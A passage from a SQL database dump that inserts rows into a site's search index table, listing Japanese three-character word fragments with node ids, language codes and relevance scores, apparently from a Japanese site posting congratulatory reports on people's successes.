('げると', 198, 'ja', 'node_search', 0.833529),
('げると', 199, 'ja', 'node_search', 0.833529),
('げる重', 183, 'ja', 'node_search', 0.913226),
('げる重', 196, 'ja', 'node_search', 0.972861),
('ここに', 1, 'ja', 'node_search', 0.942091),
('こだわ', 27, 'ja', 'node_search', 0.44024),
('ことか', 122, 'ja', 'node_search', 1),
('ことが', 3, 'ja', 'node_search', 2.00189),
('ことが', 23, 'ja', 'node_search', 0.479169),
('ことが', 30, 'ja', 'node_search', 3.68468),
('ことが', 98, 'ja', 'node_search', 1),
('ことが', 122, 'ja', 'node_search', 1),
('ことが', 136, 'ja', 'node_search', 0.757065),
('ことが', 138, 'ja', 'node_search', 0.896076),
('ことが', 147, 'ja', 'node_search', 1),
('ことが', 155, 'ja', 'node_search', 0.953396),
('ことが', 163, 'ja', 'node_search', 0.989021),
('ことが', 189, 'ja', 'node_search', 0.902857),
('ことが', 193, 'ja', 'node_search', 0.902857),
('ことが', 195, 'ja', 'node_search', 0.96498),
('ことだ', 98, 'ja', 'node_search', 1),
('ことで', 138, 'ja', 'node_search', 0.659351),
('ことと', 164, 'ja', 'node_search', 1),
('ことと', 171, 'ja', 'node_search', 1),
('ことと', 177, 'ja', 'node_search', 1),
('ことと', 185, 'ja', 'node_search', 0.980874),
('ことな', 136, 'ja', 'node_search', 0.896076),
('ことに', 23, 'ja', 'node_search', 0.416977),
('ことに', 26, 'ja', 'node_search', 1),
('ことに', 68, 'ja', 'node_search', 1),
('ことに', 135, 'ja', 'node_search', 1),
('ことに', 136, 'ja', 'node_search', 0.655756),
('ことに', 144, 'ja', 'node_search', 1),
('ことは', 3, 'ja', 'node_search', 1),
('ことは', 98, 'ja', 'node_search', 1),
('ことま', 122, 'ja', 'node_search', 1),
('ことを', 80, 'ja', 'node_search', 1),
('ことを', 87, 'ja', 'node_search', 0.989021),
('ことを', 98, 'ja', 'node_search', 1),
('ことを', 116, 'ja', 'node_search', 1),
('ことを', 135, 'ja', 'node_search', 0.691597),
('ことを', 136, 'ja', 'node_search', 0.833529),
('ことを', 154, 'ja', 'node_search', 1.86995),
('ことを', 155, 'ja', 'node_search', 0.703756),
('ことを', 156, 'ja', 'node_search', 1),
('ことを', 157, 'ja', 'node_search', 0.896076),
('ことを', 160, 'ja', 'node_search', 1),
('ことを', 161, 'ja', 'node_search', 1),
('ことを', 164, 'ja', 'node_search', 1.83353),
('ことを', 165, 'ja', 'node_search', 1.82206),
('ことを', 166, 'ja', 'node_search', 1.81092),
('ことを', 167, 'ja', 'node_search', 1.91674),
('ことを', 168, 'ja', 'node_search', 1.7974),
('ことを', 169, 'ja', 'node_search', 1.8894),
('ことを', 170, 'ja', 'node_search', 1.78178),
('ことを', 171, 'ja', 'node_search', 1.86679),
('ことを', 173, 'ja', 'node_search', 1.85439),
('ことを', 174, 'ja', 'node_search', 1.7974),
('ことを', 175, 'ja', 'node_search', 1.86055),
('ことを', 176, 'ja', 'node_search', 1.91323),
('ことを', 177, 'ja', 'node_search', 2.5234),
('ことを', 178, 'ja', 'node_search', 1.86366),
('ことを', 180, 'ja', 'node_search', 1),
('ことを', 181, 'ja', 'node_search', 1),
('ことを', 182, 'ja', 'node_search', 1),
('ことを', 183, 'ja', 'node_search', 1.79475),
('ことを', 184, 'ja', 'node_search', 1.78691),
('ことを', 185, 'ja', 'node_search', 1.76676),
('ことを', 186, 'ja', 'node_search', 1),
('ことを', 187, 'ja', 'node_search', 1.78951),
('ことを', 188, 'ja', 'node_search', 1.87634),
('ことを', 189, 'ja', 'node_search', 1.76676),
('ことを', 190, 'ja', 'node_search', 1.8249),
('ことを', 191, 'ja', 'node_search', 1),
('ことを', 192, 'ja', 'node_search', 1),
('ことを', 193, 'ja', 'node_search', 1),
('ことを', 194, 'ja', 'node_search', 1.80545),
('ことを', 195, 'ja', 'node_search', 1),
('ことを', 196, 'ja', 'node_search', 1),
('ことを', 197, 'ja', 'node_search', 1.82776),
('ことを', 198, 'ja', 'node_search', 1),
('ことを', 199, 'ja', 'node_search', 1.7717),
('こにい', 1, 'ja', 'node_search', 0.938382),
('このた', 161, 'ja', 'node_search', 1),
('このア', 138, 'ja', 'node_search', 1),
('このイ', 122, 'ja', 'node_search', 1),
('この合', 191, 'ja', 'node_search', 1),
('この成', 199, 'ja', 'node_search', 1),
('この旅', 120, 'ja', 'node_search', 1),
('この旅', 140, 'ja', 'node_search', 1),
('この機', 116, 'ja', 'node_search', 1),
('この節', 120, 'ja', 'node_search', 1),
('この素', 160, 'ja', 'node_search', 0.972861),
('この素', 166, 'ja', 'node_search', 1),
('この素', 168, 'ja', 'node_search', 0.869951),
('この素', 170, 'ja', 'node_search', 0.879565),
('この素', 195, 'ja', 'node_search', 0.938382),
('この素', 198, 'ja', 'node_search', 0.892724),
('この黄', 62, 'ja', 'node_search', 0.525844),
('これか', 160, 'ja', 'node_search', 0.839384),
('これか', 161, 'ja', 'node_search', 0.886095),
('これか', 164, 'ja', 'node_search', 0.813674),
('これか', 173, 'ja', 'node_search', 0.824901),
('これか', 175, 'ja', 'node_search', 0.833529),
('これか', 176, 'ja', 'node_search', 0.800068),
('これま', 171, 'ja', 'node_search', 0.972861),
('これま', 174, 'ja', 'node_search', 1),
('これま', 175, 'ja', 'node_search', 1),
('これま', 176, 'ja', 'node_search', 1),
('これま', 177, 'ja', 'node_search', 0.968904),
('これま', 178, 'ja', 'node_search', 1),
('これま', 184, 'ja', 'node_search', 1),
('これま', 187, 'ja', 'node_search', 1),
('これら', 136, 'ja', 'node_search', 0.672252),
('ござい', 1, 'ja', 'node_search', 1),
('ござい', 68, 'ja', 'node_search', 23);
INSERT INTO `search_index` (`word`, `sid`, `langcode`, `type`, `score`) VALUES
('ござい', 69, 'ja', 'node_search', 1),
('ござい', 70, 'ja', 'node_search', 20),
('ござい', 71, 'ja', 'node_search', 2),
('ござい', 72, 'ja', 'node_search', 20),
('ござい', 73, 'ja', 'node_search', 20),
('ござい', 74, 'ja', 'node_search', 20),
('ござい', 75, 'ja', 'node_search', 47),
('ござい', 76, 'ja', 'node_search', 20),
('ござい', 77, 'ja', 'node_search', 26),
('ござい', 78, 'ja', 'node_search', 23),
('ござい', 80, 'ja', 'node_search', 25.9892),
('ござい', 81, 'ja', 'node_search', 23),
('ござい', 82, 'ja', 'node_search', 47),
('ござい', 83, 'ja', 'node_search', 1),
('ござい', 84, 'ja', 'node_search', 47),
('ござい', 85, 'ja', 'node_search', 23),
('ござい', 86, 'ja', 'node_search', 1),
('ござい', 88, 'ja', 'node_search', 1),
('ござい', 89, 'ja', 'node_search', 1),
('ござい', 90, 'ja', 'node_search', 47),
('ござい', 91, 'ja', 'node_search', 1),
('ござい', 92, 'ja', 'node_search', 1),
('ござい', 93, 'en', 'node_search', 2),
('ござい', 93, 'ja', 'node_search', 1),
('ござい', 96, 'ja', 'node_search', 20),
('ござい', 97, 'ja', 'node_search', 20),
('ござい', 99, 'ja', 'node_search', 20),
('ござい', 100, 'ja', 'node_search', 23),
('ござい', 101, 'ja', 'node_search', 20),
('ござい', 102, 'ja', 'node_search', 23),
('ござい', 103, 'ja', 'node_search', 20),
('ござい', 104, 'ja', 'node_search', 29),
('ござい', 105, 'ja', 'node_search', 1),
('ござい', 106, 'ja', 'node_search', 20),
('ござい', 107, 'ja', 'node_search', 20),
('ござい', 108, 'ja', 'node_search', 20),
('ござい', 109, 'ja', 'node_search', 23),
('ござい', 110, 'ja', 'node_search', 20),
('ござい', 111, 'ja', 'node_search', 19),
('ござい', 112, 'ja', 'node_search', 20),
('ござい', 113, 'ja', 'node_search', 1),
('ござい', 114, 'ja', 'node_search', 20),
('ござい', 115, 'ja', 'node_search', 20),
('ござい', 117, 'ja', 'node_search', 20),
('ござい', 118, 'ja', 'node_search', 20),
('ござい', 119, 'ja', 'node_search', 20),
('ござい', 121, 'ja', 'node_search', 20),
('ござい', 123, 'ja', 'node_search', 20),
('ござい', 124, 'ja', 'node_search', 20),
('ござい', 125, 'ja', 'node_search', 20),
('ござい', 127, 'ja', 'node_search', 19),
('ござい', 128, 'ja', 'node_search', 19),
('ござい', 129, 'ja', 'node_search', 19),
('ござい', 130, 'ja', 'node_search', 19),
('ござい', 131, 'ja', 'node_search', 20),
('ござい', 132, 'ja', 'node_search', 20),
('ござい', 134, 'ja', 'node_search', 20),
('ござい', 135, 'ja', 'node_search', 0.657549),
('ござい', 137, 'ja', 'node_search', 20),
('ござい', 139, 'ja', 'node_search', 20),
('ござい', 140, 'ja', 'node_search', 1),
('ござい', 141, 'ja', 'node_search', 20),
('ござい', 143, 'ja', 'node_search', 20),
('ござい', 144, 'ja', 'node_search', 20),
('ござい', 145, 'ja', 'node_search', 20),
('ござい', 146, 'ja', 'node_search', 20),
('ござい', 147, 'ja', 'node_search', 20),
('ござい', 148, 'ja', 'node_search', 20),
('ござい', 151, 'ja', 'node_search', 20),
('ござい', 152, 'en', 'node_search', 20),
('ござい', 152, 'ja', 'node_search', 20),
('ござい', 153, 'ja', 'node_search', 20),
('ござい', 161, 'ja', 'node_search', 0.792123),
('ござい', 166, 'ja', 'node_search', 0.779231),
('ござい', 168, 'ja', 'node_search', 0.766757),
('ござい', 170, 'ja', 'node_search', 0.752312),
('ござい', 181, 'ja', 'node_search', 4),
('ござい', 182, 'ja', 'node_search', 0.822065),
('ござい', 183, 'ja', 'node_search', 0.757065),
('ござい', 187, 'ja', 'node_search', 0.745294),
('ござい', 190, 'ja', 'node_search', 0.776703),
('ござい', 194, 'ja', 'node_search', 0.759465),
('ござい', 197, 'ja', 'node_search', 0.776703),
('ご出発', 113, 'ja', 'node_search', 1),
('ご利用', 162, 'ja', 'node_search', 0.980874),
('ご合格', 187, 'ja', 'node_search', 0.76431),
('ご合格', 190, 'ja', 'node_search', 0.797402),
('ご合格', 194, 'ja', 'node_search', 0.779231),
('ご合格', 197, 'ja', 'node_search', 0.797402),
('ご報告', 154, 'ja', 'node_search', 1),
('ご報告', 160, 'ja', 'node_search', 28),
('ご報告', 164, 'ja', 'node_search', 1),
('ご報告', 165, 'ja', 'node_search', 1),
('ご報告', 167, 'ja', 'node_search', 1),
('ご報告', 169, 'ja', 'node_search', 1),
('ご報告', 171, 'ja', 'node_search', 1),
('ご報告', 173, 'ja', 'node_search', 1),
('ご報告', 174, 'ja', 'node_search', 1),
('ご報告', 175, 'ja', 'node_search', 1),
('ご報告', 176, 'ja', 'node_search', 1),
('ご報告', 177, 'ja', 'node_search', 1),
('ご報告', 179, 'ja', 'node_search', 1),
('ご報告', 182, 'ja', 'node_search', 27),
('ご報告', 184, 'ja', 'node_search', 1),
('ご家族', 154, 'ja', 'node_search', 0.953396),
('ご家族', 156, 'ja', 'node_search', 1),
('ご家族', 157, 'ja', 'node_search', 0.993146),
('ご成功', 161, 'ja', 'node_search', 0.769219),
('ご成功', 186, 'ja', 'node_search', 0.786915),
('ご本人', 160, 'ja', 'node_search', 1),
('ご本人', 161, 'ja', 'node_search', 1),
('ご本人', 164, 'ja', 'node_search', 1),
('ご本人', 166, 'ja', 'node_search', 1),
('ご本人', 168, 'ja', 'node_search', 1),
('ご本人', 170, 'ja', 'node_search', 1),
('ご本人', 171, 'ja', 'node_search', 1),
('ご本人', 174, 'ja', 'node_search', 1),
('ご本人', 177, 'ja', 'node_search', 1),
('ご本人', 179, 'ja', 'node_search', 1),
('ご本人', 180, 'ja', 'node_search', 1),
('ご本人', 185, 'ja', 'node_search', 1),
('ご本人', 186, 'ja', 'node_search', 1),
('ご本人', 188, 'ja', 'node_search', 1),
('ご本人', 191, 'ja', 'node_search', 1),
('ご本人', 192, 'ja', 'node_search', 1),
('ご本人', 193, 'ja', 'node_search', 1),
('ご本人', 194, 'ja', 'node_search', 1),
('ご本人', 195, 'ja', 'node_search', 1),
('ご本人', 196, 'ja', 'node_search', 1),
('ご本人', 197, 'ja', 'node_search', 1),
('ご本人', 198, 'ja', 'node_search', 1),
('ご本人', 199, 'ja', 'node_search', 1),
('ご活躍', 154, 'ja', 'node_search', 0.889397),
('ご活躍', 156, 'ja', 'node_search', 1),
('ご活躍', 157, 'ja', 'node_search', 1),
('ご活躍', 160, 'ja', 'node_search', 0.860547),
('ご活躍', 161, 'ja', 'node_search', 0.909743),
('ご活躍', 166, 'ja', 'node_search', 0.889397),
('ご活躍', 168, 'ja', 'node_search', 0.892724),
('ご活躍', 169, 'ja', 'node_search', 0.848323),
('ご活躍', 170, 'ja', 'node_search', 0.902857),
('ご活躍', 171, 'ja', 'node_search', 0.827757),
('ご活躍', 176, 'ja', 'node_search', 0.860547),
('ご活躍', 177, 'ja', 'node_search', 0.740689),
('ご活躍', 178, 'ja', 'node_search', 0.810915),
('ご活躍', 179, 'ja', 'node_search', 0.752312),
('ご活躍', 180, 'ja', 'node_search', 0.839384),
('ご活躍', 181, 'ja', 'node_search', 0.822065),
('ご活躍', 182, 'ja', 'node_search', 0.873132),
('ご活躍', 188, 'ja', 'node_search', 0.779231),
('ご活躍', 190, 'ja', 'node_search', 0.839384),
('ご活躍', 191, 'ja', 'node_search', 0.827757),
('ご活躍', 192, 'ja', 'node_search', 0.813674),
('ご活躍', 193, 'ja', 'node_search', 0.813674),
('ご活躍', 195, 'ja', 'node_search', 0.836446),
('ご活躍', 196, 'ja', 'node_search', 0.836446),
('ご活躍', 198, 'ja', 'node_search', 0.800068),
('ご満足', 27, 'ja', 'node_search', 0.306736),
('ご紹介', 162, 'ja', 'node_search', 1),
('ご自宅', 162, 'ja', 'node_search', 0.957226),
('ご興味', 163, 'ja', 'node_search', 0.643484),
('ご覧く', 1, 'ja', 'node_search', 1),
('ご訪問', 1, 'ja', 'node_search', 1),
('させて', 27, 'ja', 'node_search', 0.906215),
('させま', 87, 'ja', 'node_search', 0.819249),
('さった', 120, 'ja', 'node_search', 1),
('さと献', 135, 'ja', 'node_search', 0.836446),
('さなけ', 18, 'ja', 'node_search', 0.923838),
('さの尊', 87, 'ja', 'node_search', 0.60778),
('さまざ', 27, 'ja', 'node_search', 0.36443),
('さまざ', 183, 'ja', 'node_search', 0.942091),
('さらな', 69, 'ja', 'node_search', 1),
('さらな', 95, 'ja', 'node_search', 19),
('さらな', 113, 'ja', 'node_search', 1),
('さらな', 161, 'ja', 'node_search', 0.779231),
('さらな', 171, 'ja', 'node_search', 0.816452),
('さらな', 178, 'ja', 'node_search', 0.822065),
('さらな', 180, 'ja', 'node_search', 0.827757),
('さらな', 181, 'ja', 'node_search', 0.842342),
('さらな', 182, 'ja', 'node_search', 0.896076),
('さらな', 183, 'ja', 'node_search', 0.866793),
('さらな', 186, 'ja', 'node_search', 0.797402),
('さらな', 192, 'ja', 'node_search', 0.923838),
('さらな', 193, 'ja', 'node_search', 0.942091),
('さらな', 196, 'ja', 'node_search', 0.824901),
('さらな', 199, 'ja', 'node_search', 0.906287),
('さらに', 1, 'ja', 'node_search', 1),
('さらに', 23, 'ja', 'node_search', 0.537506),
('さらに', 138, 'ja', 'node_search', 0.879565),
('さらに', 195, 'ja', 'node_search', 1),
('さる熱', 133, 'ja', 'node_search', 0.863659),
('された', 27, 'ja', 'node_search', 0.569105),
('された', 62, 'ja', 'node_search', 4),
('された', 154, 'ja', 'node_search', 1),
('された', 156, 'ja', 'node_search', 1.94583),
('された', 157, 'ja', 'node_search', 1.83645),
('された', 160, 'ja', 'node_search', 1),
('された', 161, 'ja', 'node_search', 1),
('された', 164, 'ja', 'node_search', 1),
('された', 165, 'ja', 'node_search', 1),
('された', 166, 'ja', 'node_search', 1),
('された', 167, 'ja', 'node_search', 1),
('された', 168, 'ja', 'node_search', 1),
('された', 169, 'ja', 'node_search', 1),
('された', 170, 'ja', 'node_search', 1),
('された', 171, 'ja', 'node_search', 1),
('された', 173, 'ja', 'node_search', 1),
('された', 174, 'ja', 'node_search', 1),
('された', 175, 'ja', 'node_search', 1),
('された', 176, 'ja', 'node_search', 1),
('された', 177, 'ja', 'node_search', 1),
('された', 178, 'ja', 'node_search', 1),
('された', 180, 'ja', 'node_search', 1),
('された', 181, 'ja', 'node_search', 1),
('された', 182, 'ja', 'node_search', 1),
('された', 183, 'ja', 'node_search', 1),
('された', 184, 'ja', 'node_search', 1),
('された', 185, 'ja', 'node_search', 1),
('された', 186, 'ja', 'node_search', 1),
('された', 187, 'ja', 'node_search', 1),
('された', 188, 'ja', 'node_search', 1),
('された', 189, 'ja', 'node_search', 1.90286),
('された', 190, 'ja', 'node_search', 1),
('された', 191, 'ja', 'node_search', 1),
('された', 192, 'ja', 'node_search', 1),
('された', 193, 'ja', 'node_search', 1),
('された', 194, 'ja', 'node_search', 1),
('された', 195, 'ja', 'node_search', 1),
('された', 196, 'ja', 'node_search', 1),
('された', 197, 'ja', 'node_search', 1),
('された', 198, 'ja', 'node_search', 1),
('された', 199, 'ja', 'node_search', 1),
('されて', 5, 'ja', 'node_search', 3),
('されて', 27, 'ja', 'node_search', 1.4619),
('されて', 140, 'ja', 'node_search', 0.863659),
('されて', 162, 'ja', 'node_search', 0.851346),
('されて', 187, 'ja', 'node_search', 0.886095),
('されま', 6, 'ja', 'node_search', 3),
('されま', 27, 'ja', 'node_search', 0.335279),
('されま', 62, 'ja', 'node_search', 0.650439),
('されま', 126, 'ja', 'node_search', 1),
('されま', 160, 'ja', 'node_search', 0.747619),
('されま', 161, 'ja', 'node_search', 0.749958),
('されま', 164, 'ja', 'node_search', 0.752312),
('されま', 165, 'ja', 'node_search', 0.749958),
('されま', 166, 'ja', 'node_search', 0.771698),
('されま', 167, 'ja', 'node_search', 1.81645),
('されま', 168, 'ja', 'node_search', 0.759465),
('されま', 169, 'ja', 'node_search', 1.77594),
('されま', 170, 'ja', 'node_search', 0.745294),
('されま', 171, 'ja', 'node_search', 0.774192),
('されま', 173, 'ja', 'node_search', 1.71148),
('されま', 174, 'ja', 'node_search', 1.7185),
('されま', 175, 'ja', 'node_search', 1.76431),
('されま', 176, 'ja', 'node_search', 1.74069),
('されま', 177, 'ja', 'node_search', 1.57055),
('されま', 178, 'ja', 'node_search', 0.781775),
('されま', 179, 'ja', 'node_search', 1.73165),
('されま', 180, 'ja', 'node_search', 1.69614),
('されま', 181, 'ja', 'node_search', 1.78178),
('されま', 182, 'ja', 'node_search', 1.79212),
('されま', 183, 'ja', 'node_search', 1.73165),
('されま', 184, 'ja', 'node_search', 1.6334),
('されま', 185, 'ja', 'node_search', 1.60366),
('されま', 186, 'ja', 'node_search', 1.69665),
('されま', 187, 'ja', 'node_search', 0.740689),
('されま', 188, 'ja', 'node_search', 0.76188),
('されま', 189, 'ja', 'node_search', 0.749958),
('されま', 190, 'ja', 'node_search', 1.69665),
('されま', 191, 'ja', 'node_search', 0.808176),
('されま', 192, 'ja', 'node_search', 0.779231),
('されま', 193, 'ja', 'node_search', 1.68085),
('されま', 194, 'ja', 'node_search', 1.75231),
('されま', 195, 'ja', 'node_search', 1.75128),
('されま', 196, 'ja', 'node_search', 0.797402),
('されま', 197, 'ja', 'node_search', 0.769219),
('されま', 198, 'ja', 'node_search', 1.68123),
('されま', 199, 'ja', 'node_search', 1.62147),
('される', 6, 'ja', 'node_search', 3),
('される', 24, 'ja', 'node_search', 0.43709),
('される', 154, 'ja', 'node_search', 0.879565),
('される', 164, 'ja', 'node_search', 1),
('される', 171, 'ja', 'node_search', 1),
('される', 173, 'ja', 'node_search', 0.863659),
('される', 176, 'ja', 'node_search', 0.923838),
('される', 177, 'ja', 'node_search', 1.73389),
('される', 183, 'ja', 'node_search', 0.802752),
('される', 188, 'ja', 'node_search', 0.886095),
('される', 190, 'ja', 'node_search', 1.83063),
('される', 195, 'ja', 'node_search', 0.976851),
('される', 197, 'ja', 'node_search', 0.836446),
('さを保', 23, 'ja', 'node_search', 0.501918),
('さを避', 142, 'ja', 'node_search', 1),
('さんが', 112, 'ja', 'node_search', 1),
('さんが', 114, 'ja', 'node_search', 1),
('さんが', 121, 'ja', 'node_search', 1),
('さんが', 123, 'ja', 'node_search', 1),
('さんが', 125, 'ja', 'node_search', 1),
('さんが', 131, 'ja', 'node_search', 1),
('さんが', 141, 'ja', 'node_search', 1),
('さんが', 156, 'ja', 'node_search', 1.94583),
('さんが', 160, 'ja', 'node_search', 3.99047),
('さんが', 161, 'ja', 'node_search', 1.74996),
('さんが', 164, 'ja', 'node_search', 1.75231),
('さんが', 166, 'ja', 'node_search', 4.08679),
('さんが', 168, 'ja', 'node_search', 1.75946),
('さんが', 170, 'ja', 'node_search', 3.98118),
('さんが', 171, 'ja', 'node_search', 4.11692),
('さんが', 174, 'ja', 'node_search', 1.72283),
('さんが', 175, 'ja', 'node_search', 1.76922),
('さんが', 177, 'ja', 'node_search', 1.71423),
('さんが', 178, 'ja', 'node_search', 1.78178),
('さんが', 179, 'ja', 'node_search', 1.73614),
('さんが', 180, 'ja', 'node_search', 1.80007),
('さんが', 181, 'ja', 'node_search', 1.80275),
('さんが', 182, 'ja', 'node_search', 4.2547),
('さんが', 183, 'ja', 'node_search', 3.99983),
('さんが', 184, 'ja', 'node_search', 1.76188),
('さんが', 185, 'ja', 'node_search', 4.00925),
('さんが', 186, 'ja', 'node_search', 1.76922),
('さんが', 187, 'ja', 'node_search', 3.96276),
('さんが', 188, 'ja', 'node_search', 1.76188),
('さんが', 189, 'ja', 'node_search', 3.99983),
('さんが', 190, 'ja', 'node_search', 4.07688),
('さんが', 191, 'ja', 'node_search', 4.2327),
('さんが', 192, 'ja', 'node_search', 4.11692),
('さんが', 193, 'ja', 'node_search', 4.17901),
('さんが', 194, 'ja', 'node_search', 4.00925),
('さんが', 195, 'ja', 'node_search', 1.80545),
('さんが', 196, 'ja', 'node_search', 4.18961),
('さんが', 197, 'ja', 'node_search', 4.07688),
('さんが', 198, 'ja', 'node_search', 1.78178),
('さんが', 199, 'ja', 'node_search', 4.01872),
('さんと', 83, 'ja', 'node_search', 1),
('さんと', 88, 'ja', 'node_search', 1),
('さんと', 89, 'ja', 'node_search', 1),
('さんと', 92, 'ja', 'node_search', 1),
('さんと', 93, 'en', 'node_search', 27),
('さんと', 105, 'ja', 'node_search', 1),
('さんと', 112, 'ja', 'node_search', 1),
('さんと', 114, 'ja', 'node_search', 1),
('さんと', 121, 'ja', 'node_search', 1),
('さんと', 123, 'ja', 'node_search', 1),
('さんと', 125, 'ja', 'node_search', 1),
('さんと', 184, 'ja', 'node_search', 1.76188),
('さんの', 83, 'ja', 'node_search', 1),
('さんの', 140, 'ja', 'node_search', 2.81645),
('さんは', 181, 'ja', 'node_search', 1),
('さんは', 182, 'ja', 'node_search', 1),
('ざいま', 1, 'ja', 'node_search', 1),
('ざいま', 68, 'ja', 'node_search', 23),
('ざいま', 69, 'ja', 'node_search', 1),
('ざいま', 70, 'ja', 'node_search', 20),
('ざいま', 71, 'ja', 'node_search', 2),
('ざいま', 72, 'ja', 'node_search', 20),
('ざいま', 73, 'ja', 'node_search', 20),
('ざいま', 74, 'ja', 'node_search', 20),
('ざいま', 75, 'ja', 'node_search', 47),
('ざいま', 76, 'ja', 'node_search', 20),
('ざいま', 77, 'ja', 'node_search', 23),
('ざいま', 78, 'ja', 'node_search', 23),
('ざいま', 80, 'ja', 'node_search', 25.9892),
('ざいま', 81, 'ja', 'node_search', 23),
('ざいま', 82, 'ja', 'node_search', 47),
('ざいま', 83, 'ja', 'node_search', 1),
('ざいま', 84, 'ja', 'node_search', 47),
('ざいま', 85, 'ja', 'node_search', 23),
('ざいま', 86, 'ja', 'node_search', 1),
('ざいま', 88, 'ja', 'node_search', 1),
('ざいま', 89, 'ja', 'node_search', 1),
('ざいま', 90, 'ja', 'node_search', 47),
('ざいま', 91, 'ja', 'node_search', 1),
('ざいま', 92, 'ja', 'node_search', 1),
('ざいま', 93, 'en', 'node_search', 2),
('ざいま', 93, 'ja', 'node_search', 1),
('ざいま', 96, 'ja', 'node_search', 20),
('ざいま', 97, 'ja', 'node_search', 20),
('ざいま', 99, 'ja', 'node_search', 20),
('ざいま', 100, 'ja', 'node_search', 23),
('ざいま', 101, 'ja', 'node_search', 20),
('ざいま', 102, 'ja', 'node_search', 23),
('ざいま', 103, 'ja', 'node_search', 20),
('ざいま', 104, 'ja', 'node_search', 23),
('ざいま', 105, 'ja', 'node_search', 1),
('ざいま', 106, 'ja', 'node_search', 20),
('ざいま', 107, 'ja', 'node_search', 20),
('ざいま', 108, 'ja', 'node_search', 20),
('ざいま', 109, 'ja', 'node_search', 23),
('ざいま', 110, 'ja', 'node_search', 20),
('ざいま', 111, 'ja', 'node_search', 19),
('ざいま', 112, 'ja', 'node_search', 20),
('ざいま', 113, 'ja', 'node_search', 1),
('ざいま', 114, 'ja', 'node_search', 20),
('ざいま', 115, 'ja', 'node_search', 20),
('ざいま', 117, 'ja', 'node_search', 20),
('ざいま', 118, 'ja', 'node_search', 20),
('ざいま', 119, 'ja', 'node_search', 20),
('ざいま', 121, 'ja', 'node_search', 20),
('ざいま', 123, 'ja', 'node_search', 20),
('ざいま', 124, 'ja', 'node_search', 20),
('ざいま', 125, 'ja', 'node_search', 20),
('ざいま', 127, 'ja', 'node_search', 19),
('ざいま', 128, 'ja', 'node_search', 19),
('ざいま', 129, 'ja', 'node_search', 19),
('ざいま', 130, 'ja', 'node_search', 19),
('ざいま', 131, 'ja', 'node_search', 20),
('ざいま', 132, 'ja', 'node_search', 20),
('ざいま', 134, 'ja', 'node_search', 20),
('ざいま', 135, 'ja', 'node_search', 0.655756),
('ざいま', 137, 'ja', 'node_search', 20),
('ざいま', 139, 'ja', 'node_search', 20),
('ざいま', 140, 'ja', 'node_search', 1),
('ざいま', 141, 'ja', 'node_search', 20),
('ざいま', 143, 'ja', 'node_search', 20),
('ざいま', 144, 'ja', 'node_search', 20),
('ざいま', 145, 'ja', 'node_search', 20),
('ざいま', 146, 'ja', 'node_search', 20),
('ざいま', 147, 'ja', 'node_search', 20),
('ざいま', 148, 'ja', 'node_search', 20),
('ざいま', 151, 'ja', 'node_search', 20),
('ざいま', 152, 'en', 'node_search', 20),
('ざいま', 152, 'ja', 'node_search', 20),
('ざいま', 153, 'ja', 'node_search', 20),
('ざいま', 161, 'ja', 'node_search', 0.78951),
('ざいま', 166, 'ja', 'node_search', 0.776703),
('ざいま', 168, 'ja', 'node_search', 0.76431),
('ざいま', 170, 'ja', 'node_search', 0.749958),
('ざいま', 181, 'ja', 'node_search', 4),
('ざいま', 182, 'ja', 'node_search', 0.819249),
('ざいま', 183, 'ja', 'node_search', 0.754681),
('ざいま', 187, 'ja', 'node_search', 0.742984),
('ざいま', 190, 'ja', 'node_search', 0.774192),
('ざいま', 194, 'ja', 'node_search', 0.757065),
('ざいま', 197, 'ja', 'node_search', 0.774192),
('ざまな', 27, 'ja', 'node_search', 0.363357),
('ざまな', 183, 'ja', 'node_search', 0.934703),
('しいも', 199, 'ja', 'node_search', 0.78951),
('しいキ', 154, 'ja', 'node_search', 1),
('しいキ', 156, 'ja', 'node_search', 1),
('しいキ', 157, 'ja', 'node_search', 0.934703),
('しいキ', 166, 'ja', 'node_search', 0.857458),
('しい人', 154, 'ja', 'node_search', 0.909743),
('しい合', 179, 'ja', 'node_search', 1),
('しい成', 160, 'ja', 'node_search', 0.953396),
('しい成', 166, 'ja', 'node_search', 0.997306),
('しい成', 168, 'ja', 'node_search', 0.854391),
('しい成', 170, 'ja', 'node_search', 0.863659),
('しい成', 178, 'ja', 'node_search', 0.993146),
('しい成', 181, 'ja', 'node_search', 1),
('しい成', 182, 'ja', 'node_search', 1),
('しい成', 183, 'ja', 'node_search', 1),
('しい成', 195, 'ja', 'node_search', 0.920273),
('しい成', 198, 'ja', 'node_search', 0.876337),
('しい挑', 187, 'ja', 'node_search', 0.827757),
('しい挑', 199, 'ja', 'node_search', 0.810915),
('しい未', 174, 'ja', 'node_search', 0.934703),
('しい機', 116, 'ja', 'node_search', 1),
('しい機', 164, 'ja', 'node_search', 0.980874),
('しい機', 171, 'ja', 'node_search', 0.989021),
('しい機', 177, 'ja', 'node_search', 0.98493),
('しい環', 169, 'ja', 'node_search', 0.976851),
('しい生', 171, 'ja', 'node_search', 0.916736),
('しい生', 175, 'ja', 'node_search', 0.98493),
('しい生', 177, 'ja', 'node_search', 0.913226),
('しい経', 174, 'ja', 'node_search', 0.822065),
('しい結', 194, 'ja', 'node_search', 0.923838),
('しい結', 197, 'ja', 'node_search', 0.916736),
('しい職', 3, 'ja', 'node_search', 0.604732),
('しい職', 167, 'ja', 'node_search', 1),
('しかし', 3, 'ja', 'node_search', 0.592848),
('しくご', 1, 'ja', 'node_search', 1),
('しく思', 1, 'ja', 'node_search', 1),
('しさの', 87, 'ja', 'node_search', 0.609315),
('しさを', 23, 'ja', 'node_search', 0.502958),
('したい', 3, 'ja', 'node_search', 1),
('したい', 24, 'ja', 'node_search', 0.395463),
('したい', 189, 'ja', 'node_search', 1),
('したす', 140, 'ja', 'node_search', 1),
('したも', 164, 'ja', 'node_search', 0.882818),
('したも', 171, 'ja', 'node_search', 0.882818),
('したも', 174, 'ja', 'node_search', 0.860547),
('したも', 189, 'ja', 'node_search', 0.784336),
('したも', 199, 'ja', 'node_search', 0.931053),
('したら', 1, 'ja', 'node_search', 1),
('したカ', 126, 'ja', 'node_search', 1),
('したキ', 163, 'ja', 'node_search', 1),
('したキ', 168, 'ja', 'node_search', 0.833529),
('したキ', 170, 'ja', 'node_search', 0.816452),
('したニ', 133, 'ja', 'node_search', 0.731649),
('したモ', 120, 'ja', 'node_search', 0.980874),
('した仕', 184, 'ja', 'node_search', 0.819249),
('した候', 157, 'ja', 'node_search', 1),
('した名', 62, 'ja', 'node_search', 1),
('した学', 23, 'ja', 'node_search', 0.456713),
('した学', 133, 'ja', 'node_search', 0.771698),
('した学', 136, 'ja', 'node_search', 2),
('した実', 140, 'ja', 'node_search', 1),
